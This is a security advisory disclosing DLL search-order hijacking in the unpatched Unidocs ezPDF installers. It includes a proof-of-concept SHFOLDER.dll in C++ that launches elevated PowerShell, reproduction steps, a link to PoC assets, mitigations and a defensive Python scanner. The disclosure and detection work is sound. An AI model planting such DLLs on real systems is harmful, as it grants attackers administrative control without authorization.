RSI-2026-0001

Advisory

Published
Intelligence Summary
Security Advisory: DLL Search Order Hijacking in Unidocs ezPDF Reader and ezPDF DRM Reader

VULNERABILITY ADVISORY - DLL SEARCH ORDER HIJACKING IN EZPDF READER INSTALLERS

DATE
January 26, 2026

VULNERABILITY SUMMARY
A Local Privilege Escalation (LPE) vulnerability exists in the installers for Unidocs ezPDF Reader and ezPDF DRM Reader. The issue stems from the application's failure to use secure, absolute paths when loading essential system libraries. By exploiting the default Windows DLL search order, a local attacker with standard user privileges can execute malicious code with administrative authority.

AFFECTED SOFTWARE
  • ezPDF DRM Reader v3.0.0.4 and below (ezPDF_DRM_Reader_3.0.0.4.exe)
  • ezPDF Reader v2.0 and below (ezPDFReader_setup.exe)

VULNERABILITY CLASSIFICATION
  • Type: DLL Search Order Hijacking
  • CWE: CWE-427 Uncontrolled Search Path Element
  • Severity: High (7.3)
  • CVSS v3.1: AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

TECHNICAL ANALYSIS
The installers are 32-bit executables that attempt to load SHFOLDER.dll. Instead of calling the library from the protected System32 directory, the executable searches the Current Working Directory (CWD) first. If the installer is run from a location where a user can write files (most commonly the Downloads folder), the application will prioritize and load a malicious SHFOLDER.dll placed there by an attacker.

Because the installer requires administrative consent (UAC) to run, any code embedded in the hijacked DLL is executed with High Mandatory Level integrity, granting the attacker full control over the host system.

PROOF OF CONCEPT
The vulnerability was verified on Windows 11 using a custom x86 DLL. The payload utilizes the DllMain entry point to spawn an elevated PowerShell instance.
Payload Code (SHFOLDER.cpp):

    #include <windows.h>

    // Runs on its own thread so that DllMain can return immediately.
    DWORD WINAPI Payload(LPVOID lpParam) {
        // Inner quotes are escaped so the command line is a valid string literal.
        WinExec("powershell.exe -NoExit -Command \"whoami /priv\"", SW_SHOW);
        return 0;
    }

    BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
        // Fires once, when the installer process maps the DLL.
        if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
            CreateThread(NULL, 0, Payload, NULL, 0, NULL);
        }
        return TRUE;
    }

REPRODUCTION STEPS
  1. Place a compiled SHFOLDER.dll (x86) into a folder.
  2. Place the ezPDF installer into the same folder.
  3. Execute the installer and accept the UAC prompt.
  4. Confirm the payload execution via the resulting elevated PowerShell window.

IMPACT
An attacker can bypass standard security boundaries to gain administrative access, install persistent malware, or access sensitive system data. This is particularly dangerous in shared environments or on systems where users frequently download and run third-party installers.

MITIGATION RECOMMENDATIONS
For Developers:
  • Use fully qualified paths for all LoadLibrary calls (e.g., C:\Windows\System32\SHFOLDER.dll).
  • Implement SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) at the start of the program.
  • Use LoadLibraryEx with the LOAD_LIBRARY_SEARCH_SYSTEM32 flag to ignore the current working directory.

For System Administrators:
  • Restrict users from running executable files directly from world-writable directories.
  • Implement Application Control policies to block unsigned or unauthorized DLLs.

STATUS
The vendor was contacted multiple times prior to this advisory but has not acknowledged the report. No official patch is currently available.

RESOURCES
  • Microsoft Security Guidance: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order
  • PoC Assets: https://gofile.me/7bU54/ZG47Lh7Yx (Password: ezpdfvulnerability)

CREDITS
Dongwoo Lee (RoyalSnek)
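While no vendor patch exists, administrators can triage user-writable folders for the condition this advisory describes: a DLL named like a system library sitting beside an executable. The following is an added example, not code from the advisory or the vendor; the function names, the constructed folder layout and the choice to treat both System32 and SysWOW64 as trusted directories are assumptions.

```python
import os
import tempfile
from pathlib import Path

def system_dll_names(system_dirs):
    """Lower-cased names of every DLL present in the trusted system directories."""
    names = set()
    for d in system_dirs:
        if Path(d).is_dir():
            names |= {p.name.lower() for p in Path(d).iterdir()
                      if p.suffix.lower() == ".dll"}
    return names

def find_shadowing_dlls(scan_dir, system_dirs):
    """Report files under scan_dir that carry the name of a system DLL and sit
    in the same folder as an executable, so an installer launched from that
    folder could resolve the library there instead of in the system directory."""
    trusted = system_dll_names(system_dirs)
    findings = []
    for root, _dirs, files in os.walk(scan_dir):
        exes = sorted(f for f in files if f.lower().endswith(".exe"))
        for name in sorted(files):
            if exes and name.lower() in trusted:
                findings.append((str(Path(root) / name), exes))
    return findings

def constructed_demo():
    """Scan a constructed layout of empty placeholder files (not real binaries)."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        for rel in ("System32/SHFOLDER.dll", "System32/kernel32.dll",
                    "Downloads/ezPDFReader_setup.exe", "Downloads/shfolder.dll",
                    "Downloads/vendor_plugin.dll", "Documents/SHFOLDER.dll"):
            (base / rel).parent.mkdir(parents=True, exist_ok=True)
            (base / rel).touch()
        hits = find_shadowing_dlls(base, [base / "System32"])
        return [(Path(p).name, exes) for p, exes in hits]

if __name__ == "__main__":
    win = os.environ.get("SystemRoot", r"C:\Windows")
    trusted_dirs = [Path(win) / "System32", Path(win) / "SysWOW64"]
    for dll, exes in find_shadowing_dlls(Path.home() / "Downloads", trusted_dirs):
        print(f"REVIEW {dll} (beside: {', '.join(exes)})")
```

A hit is a prompt for review rather than proof of tampering, since some legitimate packages ship their own copies of redistributable libraries.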

Analysis Context

This intelligence report is classified as Published and was submitted by RoyalSnek.

  • IDENTIFIER RSI-2026-0001
  • TYPE Advisory
  • PUBLISHED March 16, 2026
  • LAST MODIFIED No edits recorded
ATTRIBUTION
RoyalSnek